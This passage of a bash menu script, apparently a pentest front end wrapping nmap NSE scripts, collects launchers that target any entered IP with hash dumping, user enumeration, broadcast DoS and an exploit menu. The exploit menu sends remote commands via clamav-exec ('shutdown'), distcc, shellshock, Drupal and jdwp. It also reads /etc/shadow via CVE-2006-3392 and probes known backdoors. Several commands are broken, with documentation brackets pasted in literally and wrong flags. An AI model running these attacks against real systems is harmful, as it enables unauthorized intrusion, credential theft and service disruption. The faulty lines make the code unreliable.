- $urxvt p80 --script http-method-tamper --script-args 'http-method-tamper.paths={/protected/db.php,/protected/index.php}' $ip &
- elif test $win == '12'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script=http-userdir-enum $ip &
- elif test $win == '13'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={/path1/,/path2/}' $ip &
- elif test $win == '14'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script http-wordpress-users --script-args limit=50 $ip &
- elif test $win == '15'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- echo -ne $okegreen " The username used for authentication: " ; tput sgr0
- read user
- echo -ne $okegreen " The password used for authentication : " ; tput sgr0
- read pass
- $urxvt -p 9088 $ip --script informix-query --script-args informix-query.username=$user,informix-query.password=$pass &
- elif test $win == '16'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- echo -ne $okegreen " The username used for authentication: " ; tput sgr0
- read user
- echo -ne $okegreen " The password used for authentication : " ; tput sgr0
- read pass
- $urxvt -p 9088 $ip --script informix-tables --script-args informix-tables.username=$user,informix-tables.password=$pass &
- elif test $win == '17'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 88 $ip --script krb5-enum-users --script-args krb5-enum-users.realm='test' &
- elif test $win == '18'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 1433 $ip --script ms-sql-dump-hashes &
- elif test $win == '19'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- echo -ne $okegreen " What is your Port Target or Host: " ; tput sgr0
- read port
- $urxvt -p $port --script ms-sql-empty-password --script-args mssql.instance-all $ip &
- elif test $win == '20'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- echo -ne $okegreen " The username used for authentication: " ; tput sgr0
- read user
- echo -ne $okegreen " The password used for authentication : " ; tput sgr0
- read pass
- $urxvt -p 1433 --script ms-sql-hasdbaccess --script-args mssql.username=$user,mssql.password=$pass $ip &
- elif test $win == '21'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- echo -ne $okegreen " The username to use to connect to the server " ; tput sgr0
- read user
- echo -ne $okegreen " The password to use to connect to the server: " ; tput sgr0
- read pass
- $urxvt -p 3306 $ip --script mysql-dump-hashes --script-args="username=$user,password=$pass" &
- elif test $win == '22'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script=mysql-empty-password $ip &
- elif test $win == '23'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- echo -ne $okegreen " The username to use to connect to the server (Optional):" ; tput sgr0
- read user
- echo -ne $okegreen " The password to use to connect to the server (Optional): " ; tput sgr0
- read pass
- echo -ne $okegreen " The query for which to return the results " ; tput sgr0
- read query
- $urxvt -p 3306 $ip --script mysql-query --script-args="query="$query"[,username=$username,password=$pass]" &
- elif test $win == '24'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script=mysql-users $ip &
- elif test $win == '25'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script=ncp-enum-users $ip &
- elif test $win == '26'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 12345 --script netbus-auth-bypass $ip &
- elif test $win == '27'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt -p 1521-1560 $ip &
- elif test $win == '28'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV -sC $ip &
- elif test $win == '29'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script=sip-enum-users -sU -p 5060 $ip &
- elif test $win == '30'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -script smb-enum-users.nse -p 445 $ip &
- elif test $win == '31'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script smtp-enum-users.nse [--script-args smtp-enum-users.methods={EXPN,...},...] -p 25,465,587 $ip &
- elif test $win == '32'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sU -p 161 --script=snmp-win32-users $ip &
- elif test $win == '33'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --sV -sC $ip &
- elif test $win == '34'
- then
- nse
- else
- echo ""
- echo -e $okegreen " Incorrect Number"
- fi
- echo ""
- echo ""
- echo -n -e $red " Back to Last Menu? ( Yes / No ) :"
- read back
- if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ]
- then
- clear
- menu
- elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ]
- then
- auth
- fi
- }
- function brd () {
- clear
- echo
- echo
- echo -e $white" [$okegreen"01"$white]$cyan broadcast-ataoe-discover "
- echo -e $white" [$okegreen"02"$white]$cyan broadcast-avahi-dos "
- echo -e $white" [$okegreen"03"$white]$cyan broadcast-bjnp-discover "
- echo -e $white" [$okegreen"04"$white]$cyan broadcast-db2-discover "
- echo -e $white" [$okegreen"05"$white]$cyan broadcast-dhcp-discover "
- echo -e $white" [$okegreen"06"$white]$cyan broadcast-dhcp6-discover "
- echo -e $white" [$okegreen"07"$white]$cyan broadcast-dns-service-discovery "
- echo -e $white" [$okegreen"08"$white]$cyan broadcast-dropbox-listener "
- echo -e $white" [$okegreen"09"$white]$cyan broadcast-eigrp-discovery "
- echo -e $white" [$okegreen"10"$white]$cyan broadcast-igmp-discovery "
- echo -e $white" [$okegreen"11"$white]$cyan broadcast-listener "
- echo -e $white" [$okegreen"12"$white]$cyan broadcast-ms-sql-discover "
- echo -e $white" [$okegreen"13"$white]$cyan broadcast-netbios-master-browser "
- echo -e $white" [$okegreen"14"$white]$cyan broadcast-networker-discover "
- echo -e $white" [$okegreen"15"$white]$cyan broadcast-novell-locate "
- echo -e $white" [$okegreen"16"$white]$cyan broadcast-pc-anywhere "
- echo -e $white" [$okegreen"17"$white]$cyan broadcast-pc-duo "
- echo -e $white" [$okegreen"18"$white]$cyan broadcast-pim-discovery "
- echo -e $white" [$okegreen"19"$white]$cyan broadcast-ping "
- echo -e $white" [$okegreen"20"$white]$cyan broadcast-pppoe-discover "
- echo -e $white" [$okegreen"21"$white]$cyan broadcast-rip-discover "
- echo -e $white" [$okegreen"22"$white]$cyan broadcast-ripng-discover "
- echo -e $white" [$okegreen"23"$white]$cyan broadcast-sonicwall-discover "
- echo -e $white" [$okegreen"24"$white]$cyan broadcast-sybase-asa-discover "
- echo -e $white" [$okegreen"25"$white]$cyan broadcast-tellstick-discover "
- echo -e $white" [$okegreen"26"$white]$cyan broadcast-upnp-info "
- echo -e $white" [$okegreen"27"$white]$cyan broadcast-versant-locate "
- echo -e $white" [$okegreen"28"$white]$cyan broadcast-wake-on-lan "
- echo -e $white" [$okegreen"29"$white]$cyan broadcast-wpad-discover "
- echo -e $white" [$okegreen"30"$white]$cyan broadcast-wsdd-discover "
- echo -e $white" [$okegreen"31"$white]$cyan broadcast-xdmcp-discover "
- echo -e $white" [$okegreen"32"$white]$cyan eap-info "
- echo -e $white" [$okegreen"33"$white]$cyan ipv6-multicast-mld-list "
- echo -e $white" [$okegreen"34"$white]$cyan knx-gateway-discover "
- echo -e $white" [$okegreen"35"$white]$cyan llmnr-resolve "
- echo -e $white" [$okegreen"36"$white]$cyan lltd-discovery "
- echo -e $white" [$okegreen"37"$white]$cyan mrinfo "
- echo -e $white" [$okegreen"38"$white]$cyan mtrace "
- echo -e $white" [$okegreen"39"$white]$cyan targets-ipv6-multicast-echo "
- echo -e $white" [$okegreen"40"$white]$cyan targets-ipv6-multicast-invalid-dst "
- echo -e $white" [$okegreen"41"$white]$cyan targets-ipv6-multicast-mld "
- echo -e $white" [$okegreen"42"$white]$cyan targets-ipv6-multicast-slaac "
- echo -e $white" [$okegreen"43"$white]$cyan targets-sniffer "
- echo -e $white" [$okegreen"44"$white]$cyan back "
- echo -n -e $red' \033[4mScreetsec@nse-broadcast:\033[0m>> '; tput sgr0 #insert your choice
- read min
- if test $min == '1'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt --script broadcast-ataoe-discover -e $ie &
- elif test $min == '2'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt --script=broadcast-avahi-dos -e $ie &
- elif test $min == '3'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt --script broadcast-bjnp-discover -e $ie &
- elif test $min == '4'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt --script db2-discover -e $ie &
- elif test $min == '5'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt --script broadcast-dhcp-discover -e $ie &
- elif test $min == '6'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt -6 --script broadcast-dhcp6-discover -e $ie &
- elif test $min == '7'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt --script=broadcast-dns-service-discovery -e $ie &
- elif test $min == '8'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt --script=broadcast-dropbox-listener --script-args=newtargets -Pn -e $ie &
- elif test $min == '9'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt --script=broadcast-eigrp-discovery $ip -e $ie &
- elif test $min == '10'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt --script broadcast-igmp-discovery -e $ie &
- elif test $min == '11'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt --script broadcast-listener -e $ie &
- elif test $min == '12'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt nmap --script broadcast-ms-sql-discover -e $ie &
- elif test $min == '13'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt --script=broadcast-netbios-master-browser -e $ie &
- elif test $min == '14'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt --script broadcast-networker-discover -e $ie &
- elif test $min == '15'
- then
- echo
- echo -ne $okegreen " What is your Targets" ; tput sgr0
- read ie
- $urxvt -sV --script=broadcast-novell-locate $ie &
- elif test $min == '16'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt --script broadcast-pc-anywhere -e $ie &
- elif test $min == '17'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt --script broadcast-pc-duo -e $ie &
- elif test $min == '18'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt nmap --script broadcast-pim-discovery -e $ie &
- elif test $min == '19'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- echo -ne $okegreen " Default value for TTL is 64 & the length of the payload is 0" ; tput sgr0
- read ttl
- echo -ne $okegreen " The payload is consisted of random bytes." ; tput sgr0
- read payload
- echo -ne $okegreen " Timespec specifying how long to wait for response (default 3s)" ; tput sgr0
- read ti
- echo -ne $okegreen " Number specifying how many ICMP probes should be sent (default 1)" ; tput sgr0
- read np
- $urxvt -e $ie [--ttl $ttl] [--data-length $payload] --script broadcast-ping [--script-args [broadcast-ping.timeout=$ti],[num-probes=$np]]] &
- elif test $min == '20'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt --script broadcast-pppoe-discover -e $ie &
- elif test $min == '21'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt --script broadcast-rip-discover -e $ie &
- elif test $min == '22'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt --script broadcast-ripng-discover -e $ie &
- elif test $min == '23'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt -e $ie --script broadcast-sonicwall-discover &
- elif test $min == '24'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt --script broadcast-sybase-asa-discover -e $ie &
- elif test $min == '25'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt --script broadcast-tellstick-discover -e $ie &
- elif test $min == '26'
- then
- echo
- echo -ne $okegreen " What is your Targets" ; tput sgr0
- read ip
- $urxvt -sV --script=broadcast-upnp-info $ip &
- elif test $min == '27'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt --script broadcast-versant-locate -e $ie &
- elif test $min == '28'
- then
- echo
- echo -ne $okegreen " The MAC address of the remote system to wake up" ; tput sgr0
- read mac
- $urxvt --script broadcast-wake-on-lan --script-args broadcast-wake-on-lan.MAC="$mac" &
- elif test $min == '29'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt --script broadcast-wpad-discover -e $ie &
- elif test $min == '30'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt --script broadcast-wsdd-discover -e $ie &
- elif test $min == '31'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt --script broadcast-xdmcp-discover -e $ie &
- elif test $min == '32'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -e interface --script eap-info [--script-args="eap-info.identity=0-user,eap-info.scan={13,50}"] $ip &
- elif test $min == '33'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt --script=ipv6-multicast-mld-list -e $ie &
- elif test $min == '34'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt --script knx-gateway-discover -e $ie &
- elif test $min == '35'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- echo -ne $okegreen " Hostname to resolve : " ; tput sgr0
- read hostname
- $urxvt --script llmnr-resolve --script-args "llmnr-resolve.hostname=$hostname" -e $ie &
- elif test $min == '36'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt -e $ie --script lltd-discovery &
- elif test $min == '37'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt --script mrinfo -e $ie &
- elif test $min == '38'
- then
- echo
- echo -ne $okegreen " Source address from which to traceroute." ; tput sgr0
- read rt
- $urxvt --script mtrace --script-args "mtrace.fromip=$rt" &
- elif test $min == '39'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt --script=targets-ipv6-multicast-echo.nse --script-args "newtargets,interface=$ie" -sL &
- elif test $min == '40'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt --script=targets-ipv6-multicast-invalid-dst.nse --script-args "newtargets,interface=$ie" -sP &
- elif test $min == '41'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt --script=targets-ipv6-multicast-mld.nse --script-args "newtargets,interface=$ie" &
- elif test $min == '42'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt --script targets-ipv6-multicast-slaac --script-args "newtargets,interface=$ie" -sP &
- elif test $min == '43'
- then
- echo
- echo -ne $okegreen " What is your Interfaces" ; tput sgr0
- read ie
- $urxvt -sL --script=targets-sniffer --script-args=newtargets,targets-sniffer.timeout=5s,targets-sniffer.iface=$ie &
- elif test $min == '44'
- then
- nse
- else
- echo ""
- echo -e $okegreen " Incorrect Number"
- fi
- echo ""
- echo ""
- echo -n -e $red " Back to Last Menu? ( Yes / No ) :"
- read back
- if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ]
- then
- clear
- menu
- elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ]
- then
- brd
- fi
- }
- function exploit () {
- clear
- echo
- echo
- echo -e $white" [$okegreen"01"$white]$cyan afp-path-vuln "
- echo -e $white" [$okegreen"02"$white]$cyan clamav-exec "
- echo -e $white" [$okegreen"03"$white]$cyan distcc-cve2004-2687 "
- echo -e $white" [$okegreen"04"$white]$cyan ftp-proftpd-backdoor "
- echo -e $white" [$okegreen"05"$white]$cyan ftp-vsftpd-backdoor "
- echo -e $white" [$okegreen"06"$white]$cyan http-adobe-coldfusion-apsa1301 "
- echo -e $white" [$okegreen"07"$white]$cyan http-avaya-ipoffice-users "
- echo -e $white" [$okegreen"08"$white]$cyan http-awstatstotals-exec "
- echo -e $white" [$okegreen"09"$white]$cyan http-axis2-dir-traversal "
- echo -e $white" [$okegreen"10"$white]$cyan http-barracuda-dir-traversal "
- echo -e $white" [$okegreen"11"$white]$cyan http-coldfusion-subzero "
- echo -e $white" [$okegreen"12"$white]$cyan http-csrf "
- echo -e $white" [$okegreen"13"$white]$cyan http-dlink-backdoor "
- echo -e $white" [$okegreen"14"$white]$cyan http-dombased-xss "
- echo -e $white" [$okegreen"15"$white]$cyan http-fileupload-exploiter "
- echo -e $white" [$okegreen"16"$white]$cyan http-huawei-hg5xx-vuln "
- echo -e $white" [$okegreen"17"$white]$cyan http-litespeed-sourcecode-download "
- echo -e $white" [$okegreen"18"$white]$cyan http-majordomo2-dir-traversal "
- echo -e $white" [$okegreen"19"$white]$cyan http-phpmyadmin-dir-traversal "
- echo -e $white" [$okegreen"20"$white]$cyan http-shellshock "
- echo -e $white" [$okegreen"21"$white]$cyan http-stored-xss "
- echo -e $white" [$okegreen"22"$white]$cyan http-tplink-dir-traversal "
- echo -e $white" [$okegreen"23"$white]$cyan http-vuln-cve2006-3392 "
- echo -e $white" [$okegreen"24"$white]$cyan http-vuln-cve2009-3960 "
- echo -e $white" [$okegreen"25"$white]$cyan http-vuln-cve2012-1823 "
- echo -e $white" [$okegreen"26"$white]$cyan http-vuln-cve2013-0156 "
- echo -e $white" [$okegreen"27"$white]$cyan http-vuln-cve2013-6786 "
- echo -e $white" [$okegreen"28"$white]$cyan http-vuln-cve2013-7091 "
- echo -e $white" [$okegreen"29"$white]$cyan http-vuln-cve2014-3704 "
- echo -e $white" [$okegreen"30"$white]$cyan http-vuln-cve2014-8877 "
- echo -e $white" [$okegreen"31"$white]$cyan http-vuln-wnr1000-creds "
- echo -e $white" [$okegreen"32"$white]$cyan irc-unrealircd-backdoor "
- echo -e $white" [$okegreen"33"$white]$cyan jdwp-exec "
- echo -e $white" [$okegreen"34"$white]$cyan jdwp-inject "
- echo -e $white" [$okegreen"35"$white]$cyan qconn-exec "
- echo -e $white" [$okegreen"36"$white]$cyan smb-vuln-conficker "
- echo -e $white" [$okegreen"37"$white]$cyan smb-vuln-cve2009-3103 "
- echo -e $white" [$okegreen"38"$white]$cyan smb-vuln-ms06-025 "
- echo -e $white" [$okegreen"39"$white]$cyan smb-vuln-ms07-029 "
- echo -e $white" [$okegreen"40"$white]$cyan smb-vuln-ms08-067 "
- echo -e $white" [$okegreen"41"$white]$cyan smb-vuln-regsvc-dos "
- echo -e $white" [$okegreen"42"$white]$cyan smtp-vuln-cve2010-4344 "
- echo -e $white" [$okegreen"43"$white]$cyan supermicro-ipmi-conf "
- echo -e $white" [$okegreen"44"$white]$cyan back "
- echo -e " "
- echo -n -e $red' \033[4mScreetsec@nse-exploit:\033[0m>> '; tput sgr0 #insert your choice
- read cin
- if test $cin == '1'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script=afp-path-vuln $ip &
- elif test $cin == '2'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script clamav-exec --script-args cmd='shutdown' $ip &
- elif test $cin == '3'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 3632 $ip --script distcc-exec --script-args="distcc-exec.cmd='id'" &
- elif test $cin == '4'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script ftp-proftpd-backdoor -p 21 $ip &
- elif test $cin == '5'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script ftp-vsftpd-backdoor -p 21 $ip &
- elif test $cin == '6'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p80 --script http-adobe-coldfusion-apsa1301 --script-args basepath=/cf/adminapi/ $ip &
- elif test $cin == '7'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script http-avaya-ipoffice-users $ip &
- elif test $cin == '8'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script http-awstatstotals-exec.nse --script-args 'http-awstatstotals-exec.cmd="uname -a", http-awstatstotals-exec.uri=/awstats/index.php' $ip &
- elif test $cin == '9'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p80 --script http-axis2-dir-traversal $ip &
- elif test $cin == '10'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- echo -ne $okegreen " What is your Port Target or Host: " ; tput sgr0
- read port
- $urxvt --script http-barracuda-dir-traversal --script-args http-max-cache-size=5000000 -p $port $ip &
- elif test $cin == '11'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 80 --script http-coldfusion-subzero --script-args basepath=/cf/ $ip &
- elif test $cin == '12'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 80 --script http-csrf.nse $ip &
- elif test $cin == '13'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script http-dlink-backdoor $ip &
- elif test $cin == '14'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 80 --script http-dombased-xss.nse $ip &
- elif test $cin == '15'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 80 --script http-fileupload-exploiter.nse $ip &
- elif test $cin == '16'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 80 --script http-huawei-hg5xx-vuln $ip &
- elif test $cin == '17'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p80 --script http-litespeed-sourcecode-download --script-args http-litespeed-sourcecode-download.uri=/phpinfo.php $ip &
- elif test $cin == '18'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 80 --script http-majordomo2-dir-traversal $ip &
- elif test $cin == '19'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 80 --script http-phpmyadmin-dir-traversal $ip &
- elif test $cin == '20'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls $ip &
- elif test $cin == '21'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 80 --script http-stored-xss.nse $ip &
- elif test $cin == '22'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p80 --script http-tplink-dir-traversal.nse --script-args rfile=/etc/topology.conf -d -n -Pn $ip &
- elif test $cin == '23'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p80 --script http-vuln-cve2006-3392 --script-args http-vuln-cve2006-3392.file=/etc/shadow $ip &
- elif test $cin == '24'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script=http-vuln-cve2009-3960 --script-args http-http-vuln-cve2009-3960.root="/root/" $ip &
- elif test $cin == '25'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script http-vuln-cve2012-1823 $ip &
- elif test $cin == '26'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script http-vuln-cve2013-0156 $ip &
- elif test $cin == '27'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV http-rompager-xss $ip &
- elif test $cin == '28'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 80 --script http-vuln-cve2013-7091 --script-args http-vuln-cve2013-7091=/ZimBra $ip &
- elif test $cin == '29'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script http-vuln-cve2014-3704 --script-args http-vuln-cve2014-3704.cmd="uname -a",http-vuln-cve2014-3704.uri="/drupal" $ip &
- elif test $cin == '30'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script http-vuln-cve2014-8877 --script-args http-vuln-cve2014-8877.cmd="whoami",http-vuln-cve2014-8877.uri="/wordpress" $ip &
- elif test $cin == '31'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script http-vuln-wnr1000-creds $ip -p 80 &
- elif test $cin == '32'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script=irc-unrealircd-backdoor $ip &
- elif test $cin == '33'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- echo -ne $okegreen " What is your Port Target or Host: " ; tput sgr0
- read port
- $urxvt -sT $ip -p $port --script=+jdwp-exec --script-args cmd="date" &
- elif test $cin == '34'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- echo -ne $okegreen " What is your Port Target or Host: " ; tput sgr0
- read port
- $urxvt -sT $ip -p $port --script=+jdwp-inject --script-args filename=HelloWorld.class &
- elif test $cin == '35'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- echo -ne $okegreen " What is your Port Target or Host: " ; tput sgr0
- read port
- $urxvt --script qconn-exec --script-args qconn-exec.timeout=60,qconn-exec.bytes=1024,qconn-exec.cmd="uname -a" -p $port $ip &
- elif test $cin == '36'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script smb-vuln-conficker.nse -p 445 $ip &
- elif test $cin == '37'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script smb-vuln-cve2009-3103.nse -p 445 $ip &
- elif test $cin == '38'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script smb-vuln-ms06-025.nse -p 445 $ip &
- elif test $cin == '39'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script smb-vuln-ms07-029.nse -p 445 $ip &
- elif test $cin == '40'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script smb-vuln-ms08-067.nse -p 445 $ip &
- elif test $cin == '41'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script smb-vuln-regsvc-dos.nse -p 445 $ip &
- elif test $cin == '42'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script=smtp-vuln-cve2010-4344 --script-args="smtp-vuln-cve2010-4344.exploit" -pT:25,465,587 $ip &
- elif test $cin == '43'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p49152 --script supermicro-ipmi-conf $ip &
- elif test $cin == '44'
- then
- nse
- else
- echo ""
- echo -e $okegreen " Incorrect Number"
- fi
- echo ""
- echo ""
- echo -n -e $red " Back to Last Menu? ( Yes / No ) :"
- read back
- if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ]
- then
- clear
- menu
- elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ]
- then
- exploit
- fi
- }
- function fuzzer () {
- clear
- echo
- echo
